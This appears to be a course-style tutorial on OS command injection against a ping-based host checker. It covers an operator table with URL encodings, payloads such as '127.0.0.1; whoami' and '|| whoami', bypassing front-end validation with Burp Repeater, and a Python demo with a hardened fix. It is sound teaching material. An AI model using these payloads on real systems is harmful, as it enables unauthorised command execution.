🥚Exploitation

Command Injection Detection

Let's imagine a host checker 👍

If we enter our localhost address, it pings it and tells us whether the host is alive:

We can easily imagine that the back-end does something like this:

ping -c 1 OUR_INPUT

Here are some important operators for command injection:

Injection Operator   Injection Character   URL-Encoded Character   Executed Command
Semicolon            ;                     %3b                     Both
New Line             \n                    %0a                     Both
Background           &                     %26                     Both (second output generally shown first)
Pipe                 |                     %7c                     Both (only second output is shown)
AND                  &&                    %26%26                  Both (only if first succeeds)
OR                   ||                    %7c%7c                  Second (only if first fails)
Sub-Shell            ``                    %60%60                  Both (Linux-only)
Sub-Shell            $()                   %24%28%29               Both (Linux-only)

To perform a successful command injection we would write the expected input (e.g., an IP), then one of the operators above, and then our new command.

With a semicolon, an injection that escapes the intended functionality looks like this:

ping -c 1 127.0.0.1; whoami

Let's see in our terminal if it works:

But the web app refuses our input:

So we open the Network tab and click the Check button again:

No new network requests were made when we clicked the Check button, yet we got an error message. This indicates that the input validation is happening on the front-end.

Front-end validation is usually not enough to prevent injections, as it can be easily bypassed by sending custom HTTP requests directly to the back-end.

Bypassing Front-End Validation

Send the request to Burp Repeater and put the payload in there:

We can also try other operators:

ping -c 1 127.0.0.1 && whoami

But if we try the OR operator:

ping -c 1 127.0.0.1 || whoami

it passes but does not execute whoami: the first command returns exit code 0 (success), and || only runs the second command if the first one fails with a non-zero exit code.

So we can try breaking the original command by leaving out the IP:

ping -c 1 || whoami

In the terminal, ping exits with a usage error because no host was given, so whoami runs. Sending just || whoami as the input in Burp does the same thing on the back-end:
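The following Python script is an added example, not part of the original page or of the host checker application it describes. It reproduces the back-end bug (the `ping -c 1` string concatenated with user input and handed to a shell) and shows what the `;`, `&&`, `||` and `|` operators from the table above do, including the trick of leaving the host empty so that ping fails and `||` runs the injected command. So that it runs offline, a constructed shell function named `ping` stands in for the real binary: it prints a line when given a host and exits 1 when the host is missing. The hardened `safe_ping_argv` is the server-side check that the text says a front-end check cannot replace; the allow-list regex `HOST_RE` is my assumption of what a valid host looks like.

```python
import re
import subprocess

# Constructed stand-in for the real back-end command, so the example runs
# offline: a shell function named `ping` that prints a line when given a host
# and fails with exit code 1 when the host argument is empty. This mirrors the
# success/failure behaviour the || trick on the page relies on.
PING_STUB = 'ping() { [ -n "$3" ] && echo "PING $3" || return 1; }'

# Hypothetical allow-list for the hardened version: a dotted IPv4 address or a
# DNS-style hostname. Spaces and shell metacharacters (; & | ` $ ...) never match.
HOST_RE = re.compile(
    r"(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"
)


def run_vulnerable(user_input: str) -> str:
    """The bug the page describes: user input concatenated into a shell string.

    Returns the captured stdout so the effect of each operator can be compared.
    """
    cmd = f"{PING_STUB}; ping -c 1 {user_input}"
    # shell=True hands the whole string to /bin/sh, which parses ; | && || etc.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_injected(user_input: str, marker: str = "INJECTED") -> bool:
    """Did an injected `echo MARKER` actually reach the shell?"""
    return marker in run_vulnerable(user_input)


def safe_ping_argv(host: str) -> list:
    """Hardened form: server-side allow-list, then an argv list with no shell."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    # A list makes the host a single argument to ping; no shell ever parses it.
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    for payload in (
        "127.0.0.1; echo INJECTED",    # semicolon: both commands run
        "127.0.0.1 && echo INJECTED",  # AND: second runs because ping succeeded
        "127.0.0.1 || echo INJECTED",  # OR: second does NOT run, ping succeeded
        "|| echo INJECTED",            # OR with no host: ping fails, second runs
        "127.0.0.1 | echo INJECTED",   # pipe: only the second command's output
    ):
        print(f"{payload!r:32} -> {run_vulnerable(payload)!r}")
    for host in ("127.0.0.1", "127.0.0.1; echo INJECTED"):
        try:
            print(host, "->", safe_ping_argv(host))
        except ValueError as err:
            print(host, "->", err)
```

Note that rejecting bad input is only half of the fix: even a validated host should be passed as a list element (no `shell=True`), because a string template can still be broken by an unexpected character that the regex author forgot about.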

Here is a list of operators for other injection types:

Injection Type                            Operators
SQL Injection                             ' , ; -- /* */
Command Injection                         ; &&
LDAP Injection                            * ( ) & |
XPath Injection                           ' or and not substring concat count
OS Command Injection                      ; & |
Code Injection                            ' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal   ../ ..\\ %00
Object Injection                          ; & |
XQuery Injection                          ' ; -- /* */
Shellcode Injection                       \x \u %u %n
Header Injection                          \r %0d %0a %09

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
